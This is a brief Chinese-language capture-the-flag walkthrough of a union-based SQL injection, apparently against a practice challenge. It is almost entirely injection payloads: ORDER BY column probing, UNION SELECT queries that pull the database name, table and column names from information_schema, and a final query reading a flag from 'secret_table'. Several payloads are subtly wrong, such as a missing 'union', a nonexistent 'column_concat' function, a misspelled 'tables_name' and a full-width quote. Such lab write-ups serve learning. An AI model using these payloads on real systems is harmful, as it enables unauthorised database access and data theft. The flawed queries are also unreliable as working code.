首先,我们进去后看到一个输入框,尝试sql注入
1' order by 3# 显示正常
1' order by 4# 无法显示
1' union select 1,2,3 #
通过尝试后我们可以知道这个表中一共有三个字段
爆破数据库名
1‘ union select 1,database(),3 #
爆破表名
1' select 1,group_concat(table_name),3 from information_schema.tables where table_schema="news" #
爆破列名
1' union select 1,column_concat(column_name),3 from information_schema.columns where tables_name="secret_table" #
查看字段
1' union select 1,fl4g,3 from secret_table#